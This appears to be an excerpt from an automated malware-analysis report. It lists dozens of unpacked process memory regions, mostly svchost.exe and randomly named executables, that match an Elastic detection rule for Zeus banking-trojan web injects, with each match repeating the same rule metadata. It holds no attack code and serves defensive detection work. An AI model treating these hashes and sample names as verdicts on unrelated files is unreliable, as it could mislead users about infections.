    Source: 2.3.svchost.exe.2c70000.46.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 31.2.tGYLgZxMWmmBTD.exe.29b2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.43.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 29.2.tGYLgZxMWmmBTD.exe.aa0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.32.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 17.2.tGYLgZxMWmmBTD.exe.e12000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.883000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 34.2.tGYLgZxMWmmBTD.exe.2a20000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.21.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 5.2.tGYLgZxMWmmBTD.exe.872000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.41.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.40.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.2.svchost.exe.2a56c00.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.888400.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 34.2.tGYLgZxMWmmBTD.exe.2a20000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.50.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.45.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.23.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 6.2.tGYLgZxMWmmBTD.exe.822000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.41.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.arxtPs1STE.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 29.2.tGYLgZxMWmmBTD.exe.aa0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.20.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.52.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.51.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.21.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.35.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.3.arxtPs1STE.exe.781218.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.arxtPs1STE.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.46.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.25.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.889000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.3.arxtPs1STE.exe.77b218.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 31.2.tGYLgZxMWmmBTD.exe.2d60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.42.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 17.2.tGYLgZxMWmmBTD.exe.e70000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 6.2.tGYLgZxMWmmBTD.exe.880000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.47.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
